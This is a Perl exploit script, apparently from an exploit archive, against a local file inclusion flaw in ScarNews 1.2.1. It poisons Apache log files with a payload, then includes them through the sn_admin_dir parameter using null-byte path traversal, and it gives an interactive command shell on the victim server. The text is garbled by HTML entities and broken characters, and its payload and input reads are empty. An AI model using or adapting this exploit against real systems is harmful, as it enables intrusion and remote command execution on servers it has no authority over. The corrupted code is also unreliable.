ScarNews 1.2.1 (sn_admin_dir) Local File Inclusion Exploit

#Perl # #BeyazKurt # #ScarNews&nbsp;(sn_admin_dir)&nbsp;Local&nbsp;File&nbsp;Inclusion&nbsp;Exploit # #&nbsp;D0rk&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;\"Powered&nbsp;by&nbsp;ScarNews&nbsp;v1.2.1\"&nbsp;dorka&nbsp;gerenk&nbsp;yok&nbsp;ama&nbsp;nese&nbsp;:p #&nbsp;kodlad...m&nbsp;2&nbsp;scriptte&nbsp;di.er&nbsp;makinayla&nbsp;uctu&nbsp;:(&nbsp;:( # #Str0ke&nbsp;鼁me&nbsp;kendini&nbsp;olur&nbsp;b鰈e&nbsp;.eler&nbsp;:) # #Download&nbsp;:&nbsp;http://www.scar4u.de/scripts/scarnews/download.html # #Coded&nbsp;by&nbsp;elden&nbsp;ele&nbsp;ge鏸o&nbsp;:) # #&nbsp;Shikaa&nbsp;get&nbsp;t黵k鏴&nbsp;kas&nbsp;:D&nbsp;bi&nbsp;laf&nbsp;anlatcaz&nbsp;anlam.on&nbsp;a.g&nbsp;nese&nbsp;hotmail&nbsp;xss\'leri&nbsp;s鰉黵&nbsp;s鰉黵ebild.in&nbsp;#kadar&nbsp;:D # use&nbsp;IO::Socket; use&nbsp;LWP::Simple; #ripped @apache=( \"../../../../../var/log/httpd/access_log\", \"../../../../../var/log/httpd/error_log\", \"../apache/logs/error.log\", \"../apache/logs/access.log\", \"../../apache/logs/error.log\", \"../../apache/logs/access.log\", \"../../../apache/logs/error.log\", \"../../../apache/logs/access.log\", \"../../../../apache/logs/error.log\", \"../../../../apache/logs/access.log\", \"../../../../../apache/logs/error.log\", \"../../../../../apache/logs/access.log\", \"../logs/error.log\", \"../logs/access.log\", \"../../logs/error.log\", \"../../logs/access.log\", \"../../../logs/error.log\", \"../../../logs/access.log\", \"../../../../logs/error.log\", \"../../../../logs/access.log\", \"../../../../../logs/error.log\", \"../../../../../logs/access.log\", \"../../../../../etc/httpd/logs/access_log\", \"../../../../../etc/httpd/logs/access.log\", \"../../../../../etc/httpd/logs/error_log\", \"../../../../../etc/httpd/logs/error.log\", \"../../..&nbsp;/../../var/www/logs/access_log\", \"../../../../../var/www/logs/access.log\", \"../../../../../usr/local/apache/logs/access_log\", \"../../../../../usr/local/apache/logs/access.log\", \"../../../../../var/log/apache/access_log\", \"../../../../../var/log/apache/access.log\", \"../../../../../var/log/access_log\", \"../../../../../var/www/logs/error_log\", \"../../../../../var/www/logs/error.log\", \"../../../../../usr/local/apache/logs/error_log\", \"../../../../../usr/local/apache/logs/error.log\", \"../../../../../var/log/apache/error_log\", \"../../../../../var/log/apache/error.log\", \"../../../../../var/log/access_log\", \"../../../../../var/log/error_log\" ); if&nbsp;(@ARGV&nbsp;<&nbsp;3)&nbsp;{ print&nbsp;\" ScarNews&nbsp;(sn_admin_dir)&nbsp;Local&nbsp;File&nbsp;Inclusion&nbsp;Exploit ############################################################### Kullan.m&nbsp;:&nbsp;exploit.pl&nbsp;[victim]&nbsp;[apachepath] ############################################################### \"; exit(); } $host=$ARGV[0]; $path=$ARGV[1]; $apachepath=$ARGV[2]; print&nbsp;\"Code&nbsp;is&nbsp;injecting&nbsp;in&nbsp;logfiles... \"; $CODE=\"\"; $socket&nbsp;=&nbsp;IO::Socket::INET->new(Proto=>\"tcp\",&nbsp;PeerAddr=>\"$host\",&nbsp;PeerPort=>\"80\")&nbsp;or&nbsp;die&nbsp;\"Connection&nbsp;failed. \"; print&nbsp;$socket&nbsp;\"GET&nbsp;\".$path.$CODE.\"&nbsp;HTTP/1.1 \"; print&nbsp;$socket&nbsp;\"user-Agent:&nbsp;\".$CODE.\" \"; print&nbsp;$socket&nbsp;\"Host:&nbsp;\".$host.\" \"; print&nbsp;$socket&nbsp;\"Connection:&nbsp;close \"; close($socket); print&nbsp;\"Write&nbsp;END&nbsp;to&nbsp;exit! \"; print&nbsp;\"If&nbsp;not&nbsp;working&nbsp;try&nbsp;another&nbsp;apache&nbsp;path \"; print&nbsp;\"[shell]&nbsp;\";$cmd&nbsp;=&nbsp;; while($cmd&nbsp;!~&nbsp;\"END\")&nbsp;{ $socket&nbsp;=&nbsp;IO::Socket::INET->new(Proto=>\"tcp\",&nbsp;PeerAddr=>\"$host\",&nbsp;PeerPort=>\"80\")&nbsp;or&nbsp;die&nbsp;\"Connection&nbsp;failed. \"; #now&nbsp;include&nbsp;parameter print&nbsp;$socket&nbsp;\"GET&nbsp;\".$path.\"scarnews.inc.php?sn_admin_dir=\".$apache[$apachepath].\"%00&cmd=$cmd&nbsp;HTTP/1.1 \"; print&nbsp;$socket&nbsp;\"Host:&nbsp;\".$host.\" \"; print&nbsp;$socket&nbsp;\"Accept:&nbsp;*/* \"; print&nbsp;$socket&nbsp;\"Connection:&nbsp;close \"; while&nbsp;($raspuns&nbsp;=&nbsp;<$socket>) { print&nbsp;$raspuns; } print&nbsp;\"[shell]&nbsp;\"; $cmd&nbsp;=&nbsp;; } &nbsp;